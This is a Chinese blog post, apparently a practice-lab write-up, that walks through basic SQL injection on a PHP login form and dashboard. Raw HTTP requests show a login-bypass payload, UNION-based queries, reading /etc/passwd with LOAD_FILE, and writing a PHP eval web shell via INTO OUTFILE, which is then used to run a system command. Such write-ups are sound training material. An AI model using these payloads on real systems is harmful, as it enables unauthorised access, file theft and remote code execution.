ovBlog

SQL 注入基础知识

介绍

完成靶场sql注入，需要熟悉:

• 1.身份验证绕过
• 2.联合注入
• 3.写入文件

靶场

首先打开靶场是一个登录框，按照登录框的逻辑sql语句应该是

SELECT FROM users WHERE username="$username" and password="$password"

这时候只需要注入username的参数就可以进行身份认证绕过了，绕过的payload也很简单，只要能从数据库查询到数据就行了

SELECT FROM users WHERE username= '000' or 1= '1' #' AND password = '2'

原理就是将password的查询注释掉了，如果不需要注释也可以这么写000' or 1 or 1='1

SELECT * FROM users WHERE username='000' or 1 or 1='1' AND password = '2'

总之能绕过系统登录就行

POST / HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 36
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin' or 1='1'#&password=1

进入后台后，系统查询也存在sql注入
进行联合查询需要知道sql语句的列数，可以使用order by语句，二分查找。

30列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 30--+

15列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 15--+

7列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 7--+

4列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 4--+

5列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 5--+

6列

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 6--+

测试有5个列名

查询当前登录用户root@localhost

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' union select "","","","",user() --+

查询当前用户是否具备高权限,响应为:Y表示有

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 68
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' union select "","","","",super_priv from mysql.user --+

接着查询secure_file_priv 的值

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

• 如果为null，表示不可读写
• 如果指定了某个目录,仅限于读取这个目录
• 如果没有值，表示整个系统都可以访问

使用load_file函数读取文件

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam'UNION SELECT "","","","",LOAD_file("/etc/passwd") --+

接着写入shell，/var/www/html/ 这个目录无法写入文件，发现/var/www/html/dashboard 可以写入

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 112
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam'UNION SELECT "","","","","<?php eval($_POST[1]);?>" INTO OUTFILE '/var/www/html/dashboard/2.php' --+

POST /dashboard/2.php HTTP/1.1
Host: 83.136.255.150:42661
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

1=system("whoami");